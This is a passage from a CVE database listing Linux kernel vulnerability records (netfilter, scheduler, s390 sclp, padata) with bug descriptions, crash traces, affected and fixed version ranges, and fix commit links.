"versionType": "git"
},
{
"lessThan": "af149a46890e8285d1618bd68b8d159bdb87fdb3",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "e5888acbf1a3d8d021990ce6c6061fd5b2bb21b4",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "36a0a80f32209238469deb481967d777a3d539ee",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "01acb2e8666a6529697141a6017edbf206921913",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_chain_filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain\n\nRemove netdevice from inet/ingress basechain in case NETDEV_UNREGISTER\nevent is reported, otherwise a stale reference to netdevice remains in\nthe hook list."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:02.292Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9489e214ea8f2a90345516016aa51f2db3a8cc2f"
},
{
"url": "https://git.kernel.org/stable/c/70f17b48c86622217a58d5099d29242fc9adac58"
},
{
"url": "https://git.kernel.org/stable/c/af149a46890e8285d1618bd68b8d159bdb87fdb3"
},
{
"url": "https://git.kernel.org/stable/c/e5888acbf1a3d8d021990ce6c6061fd5b2bb21b4"
},
{
"url": "https://git.kernel.org/stable/c/36a0a80f32209238469deb481967d777a3d539ee"
},
{
"url": "https://git.kernel.org/stable/c/01acb2e8666a6529697141a6017edbf206921913"
}
],
"title": "netfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26808",
"datePublished": "2024-04-04T09:50:26.672Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T08:57:02.292Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48921 (GCVE-0-2022-48921)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 12:44
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sched/fair: Fix fault in reweight_entity
Syzbot found a GPF in reweight_entity. This has been bisected to
commit 4ef0c5c6b5ba ("kernel/sched: Fix sched_fork() access an invalid
sched_task_group")
There is a race between sched_post_fork() and setpriority(PRIO_PGRP)
within a thread group that causes a null-ptr-deref in
reweight_entity() in CFS. The scenario is that the main process spawns
number of new threads, which then call setpriority(PRIO_PGRP, 0, -20),
wait, and exit. For each of the new threads the copy_process() gets
invoked, which adds the new task_struct and calls sched_post_fork()
for it.
In the above scenario there is a possibility that
setpriority(PRIO_PGRP) and set_one_prio() will be called for a thread
in the group that is just being created by copy_process(), and for
which the sched_post_fork() has not been executed yet. This will
trigger a null pointer dereference in reweight_entity(), as it will
try to access the run queue pointer, which hasn't been set.
Before the mentioned change the cfs_rq pointer for the task has been
set in sched_fork(), which is called much earlier in copy_process(),
before the new task is added to the thread_group. Now it is done in
the sched_post_fork(), which is called after that. To fix the issue
the remove the update_load param from the update_load param() function
and call reweight_task() only if the task flag doesn't have the
TASK_NEW flag set.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48921",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:28.558357Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:01.045Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/sched/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8f317cd888059c59e2fa924bf4b0957cfa53f78e",
"status": "affected",
"version": "c85c6fadbef0a3eab41540ea628fa8fe8928c820",
"versionType": "git"
},
{
"lessThan": "e0bcd6b5779352aed88f2e538a82a39f1a7715bb",
"status": "affected",
"version": "3869eecf050416a1d19bac60926f6b5d64b0aa58",
"versionType": "git"
},
{
"lessThan": "589a954daab5e18399860b6c8ffaeaf79844eb20",
"status": "affected",
"version": "4ef0c5c6b5ba1f38f0ea1cedad0cad722f00c14a",
"versionType": "git"
},
{
"lessThan": "13765de8148f71fa795e0a6607de37c49ea5915a",
"status": "affected",
"version": "4ef0c5c6b5ba1f38f0ea1cedad0cad722f00c14a",
"versionType": "git"
},
{
"status": "affected",
"version": "25d40b828fb855ee62e1039c65a666c9afd60786",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/sched/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.137",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.137",
"versionStartIncluding": "5.10.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.15.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.14.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/fair: Fix fault in reweight_entity\n\nSyzbot found a GPF in reweight_entity. This has been bisected to\ncommit 4ef0c5c6b5ba (\"kernel/sched: Fix sched_fork() access an invalid\nsched_task_group\")\n\nThere\u00a0is a race between sched_post_fork() and setpriority(PRIO_PGRP)\nwithin a thread group that causes a null-ptr-deref\u00a0in\nreweight_entity() in CFS. The scenario is that the main process spawns\nnumber of new threads, which then call setpriority(PRIO_PGRP, 0, -20),\nwait, and exit. For each of the new threads the copy_process() gets\ninvoked, which adds the new task_struct and calls sched_post_fork()\nfor it.\n\nIn the above scenario there is a possibility that\nsetpriority(PRIO_PGRP) and set_one_prio() will be called for a thread\nin the group that is just being created by copy_process(), and for\nwhich the sched_post_fork() has not been executed yet. This will\ntrigger a null pointer dereference in reweight_entity(),\u00a0as it will\ntry to access the run queue pointer, which hasn\u0027t been set.\n\nBefore the mentioned change the cfs_rq pointer for the task has been\nset in sched_fork(), which is called much earlier in copy_process(),\nbefore the new task is added to the thread_group. Now it is done in\nthe sched_post_fork(), which is called after that. To fix the issue\nthe remove the update_load param from the update_load param() function\nand call reweight_task() only if the task flag doesn\u0027t have the\nTASK_NEW flag set."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:44:01.294Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8f317cd888059c59e2fa924bf4b0957cfa53f78e"
},
{
"url": "https://git.kernel.org/stable/c/e0bcd6b5779352aed88f2e538a82a39f1a7715bb"
},
{
"url": "https://git.kernel.org/stable/c/589a954daab5e18399860b6c8ffaeaf79844eb20"
},
{
"url": "https://git.kernel.org/stable/c/13765de8148f71fa795e0a6607de37c49ea5915a"
}
],
"title": "sched/fair: Fix fault in reweight_entity",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48921",
"datePublished": "2024-08-22T01:32:53.131Z",
"dateReserved": "2024-08-21T06:06:23.295Z",
"dateUpdated": "2025-05-04T12:44:01.294Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41068 (GCVE-0-2024-41068)
Vulnerability from cvelistv5
Published
2024-07-29 14:57
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/sclp: Fix sclp_init() cleanup on failure
If sclp_init() fails it only partially cleans up: if there are multiple
failing calls to sclp_init() sclp_state_change_event will be added several
times to sclp_reg_list, which results in the following warning:
------------[ cut here ]------------
list_add double add: new=000003ffe1598c10, prev=000003ffe1598bf0, next=000003ffe1598c10.
WARNING: CPU: 0 PID: 1 at lib/list_debug.c:35 __list_add_valid_or_report+0xde/0xf8
CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.10.0-rc3
Krnl PSW : 0404c00180000000 000003ffe0d6076a (__list_add_valid_or_report+0xe2/0xf8)
R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 RI:0 EA:3
...
Call Trace:
[<000003ffe0d6076a>] __list_add_valid_or_report+0xe2/0xf8
([<000003ffe0d60766>] __list_add_valid_or_report+0xde/0xf8)
[<000003ffe0a8d37e>] sclp_init+0x40e/0x450
[<000003ffe00009f2>] do_one_initcall+0x42/0x1e0
[<000003ffe15b77a6>] do_initcalls+0x126/0x150
[<000003ffe15b7a0a>] kernel_init_freeable+0x1ba/0x1f8
[<000003ffe0d6650e>] kernel_init+0x2e/0x180
[<000003ffe000301c>] __ret_from_fork+0x3c/0x60
[<000003ffe0d759ca>] ret_from_fork+0xa/0x30
Fix this by removing sclp_state_change_event from sclp_reg_list when
sclp_init() fails.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.367Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a778987afc36d5dc02a1f82d352a81edcaf7eb83"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/455a6653d8700a81aa8ed2b6442a3be476007090"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e51db7ab71b89dc5a17068f5e201c69f13a4c9a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf521049fcd07071ed42dc9758fce7d5ee120ec6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79b4be70d5a160969b805f638ac5b4efd0aac7a3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a31b3fdc7e735c4f8c65fe4339945c717ed6808"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be0259796d0b76bbc7461e12c186814a9e58244c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6434b33faaa063df500af355ee6c3942e0f8d982"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41068",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:21:46.444784Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:01.200Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/char/sclp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a778987afc36d5dc02a1f82d352a81edcaf7eb83",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "455a6653d8700a81aa8ed2b6442a3be476007090",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2e51db7ab71b89dc5a17068f5e201c69f13a4c9a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cf521049fcd07071ed42dc9758fce7d5ee120ec6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "79b4be70d5a160969b805f638ac5b4efd0aac7a3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0a31b3fdc7e735c4f8c65fe4339945c717ed6808",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "be0259796d0b76bbc7461e12c186814a9e58244c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6434b33faaa063df500af355ee6c3942e0f8d982",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/char/sclp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.319",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.281",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.223",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.42",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.319",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.281",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.223",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.101",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/sclp: Fix sclp_init() cleanup on failure\n\nIf sclp_init() fails it only partially cleans up: if there are multiple\nfailing calls to sclp_init() sclp_state_change_event will be added several\ntimes to sclp_reg_list, which results in the following warning:\n\n------------[ cut here ]------------\nlist_add double add: new=000003ffe1598c10, prev=000003ffe1598bf0, next=000003ffe1598c10.\nWARNING: CPU: 0 PID: 1 at lib/list_debug.c:35 __list_add_valid_or_report+0xde/0xf8\nCPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.10.0-rc3\nKrnl PSW : 0404c00180000000 000003ffe0d6076a (__list_add_valid_or_report+0xe2/0xf8)\n R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 RI:0 EA:3\n...\nCall Trace:\n [\u003c000003ffe0d6076a\u003e] __list_add_valid_or_report+0xe2/0xf8\n([\u003c000003ffe0d60766\u003e] __list_add_valid_or_report+0xde/0xf8)\n [\u003c000003ffe0a8d37e\u003e] sclp_init+0x40e/0x450\n [\u003c000003ffe00009f2\u003e] do_one_initcall+0x42/0x1e0\n [\u003c000003ffe15b77a6\u003e] do_initcalls+0x126/0x150\n [\u003c000003ffe15b7a0a\u003e] kernel_init_freeable+0x1ba/0x1f8\n [\u003c000003ffe0d6650e\u003e] kernel_init+0x2e/0x180\n [\u003c000003ffe000301c\u003e] __ret_from_fork+0x3c/0x60\n [\u003c000003ffe0d759ca\u003e] ret_from_fork+0xa/0x30\n\nFix this by removing sclp_state_change_event from sclp_reg_list when\nsclp_init() fails."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:22.613Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a778987afc36d5dc02a1f82d352a81edcaf7eb83"
},
{
"url": "https://git.kernel.org/stable/c/455a6653d8700a81aa8ed2b6442a3be476007090"
},
{
"url": "https://git.kernel.org/stable/c/2e51db7ab71b89dc5a17068f5e201c69f13a4c9a"
},
{
"url": "https://git.kernel.org/stable/c/cf521049fcd07071ed42dc9758fce7d5ee120ec6"
},
{
"url": "https://git.kernel.org/stable/c/79b4be70d5a160969b805f638ac5b4efd0aac7a3"
},
{
"url": "https://git.kernel.org/stable/c/0a31b3fdc7e735c4f8c65fe4339945c717ed6808"
},
{
"url": "https://git.kernel.org/stable/c/be0259796d0b76bbc7461e12c186814a9e58244c"
},
{
"url": "https://git.kernel.org/stable/c/6434b33faaa063df500af355ee6c3942e0f8d982"
}
],
"title": "s390/sclp: Fix sclp_init() cleanup on failure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41068",
"datePublished": "2024-07-29T14:57:29.360Z",
"dateReserved": "2024-07-12T12:17:45.630Z",
"dateUpdated": "2025-05-04T09:21:22.613Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43889 (GCVE-0-2024-43889)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
padata: Fix possible divide-by-0 panic in padata_mt_helper()
We are hit with a not easily reproducible divide-by-0 panic in padata.c at
bootup time.
[ 10.017908] Oops: divide error: 0000 1 PREEMPT SMP NOPTI
[ 10.017908] CPU: 26 PID: 2627 Comm: kworker/u1666:1 Not tainted 6.10.0-15.el10.x86_64 #1
[ 10.017908] Hardware name: Lenovo ThinkSystem SR950 [7X12CTO1WW]/[7X12CTO1WW], BIOS [PSE140J-2.30] 07/20/2021
[ 10.017908] Workqueue: events_unbound padata_mt_helper
[ 10.017908] RIP: 0010:padata_mt_helper+0x39/0xb0
:
[ 10.017963] Call Trace:
[ 10.017968] <TASK>
[ 10.018004] ? padata_mt_helper+0x39/0xb0
[ 10.018084] process_one_work+0x174/0x330
[ 10.018093] worker_thread+0x266/0x3a0
[ 10.018111] kthread+0xcf/0x100
[ 10.018124] ret_from_fork+0x31/0x50
[ 10.018138] ret_from_fork_asm+0x1a/0x30
[ 10.018147] </TASK>
Looking at the padata_mt_helper() function, the only way a divide-by-0
panic can happen is when ps->chunk_size is 0. The way that chunk_size is
initialized in padata_do_multithreaded(), chunk_size can be 0 when the
min_chunk in the passed-in padata_mt_job structure is 0.
Fix this divide-by-0 panic by making sure that chunk_size will be at least
1 no matter what the input parameters are.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 004ed42638f4428e70ead59d170f3d17ff761a0f Version: 004ed42638f4428e70ead59d170f3d17ff761a0f Version: 004ed42638f4428e70ead59d170f3d17ff761a0f Version: 004ed42638f4428e70ead59d170f3d17ff761a0f Version: 004ed42638f4428e70ead59d170f3d17ff761a0f Version: 004ed42638f4428e70ead59d170f3d17ff761a0f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43889",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:29:28.630880Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:58.618Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/padata.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ab8b397d5997d8c37610252528edc54bebf9f6d3",
"status": "affected",
"version": "004ed42638f4428e70ead59d170f3d17ff761a0f",
"versionType": "git"
},
{
"lessThan": "8f5ffd2af7274853ff91d6cd62541191d9fbd10d",
"status": "affected",
"version": "004ed42638f4428e70ead59d170f3d17ff761a0f",
"versionType": "git"
},
{
"lessThan": "a29cfcb848c31f22b4de6a531c3e1d68c9bfe09f",
"status": "affected",
"version": "004ed42638f4428e70ead59d170f3d17ff761a0f",
"versionType": "git"
},
{
"lessThan": "924f788c906dccaca30acab86c7124371e1d6f2c",
"status": "affected",
"version": "004ed42638f4428e70ead59d170f3d17ff761a0f",
"versionType": "git"
},
{
"lessThan": "da0ffe84fcc1627a7dff82c80b823b94236af905",
"status": "affected",
"version": "004ed42638f4428e70ead59d170f3d17ff761a0f",
"versionType": "git"
},
{
"lessThan": "6d45e1c948a8b7ed6ceddb14319af69424db730c",
"status": "affected",
"version": "004ed42638f4428e70ead59d170f3d17ff761a0f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/padata.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
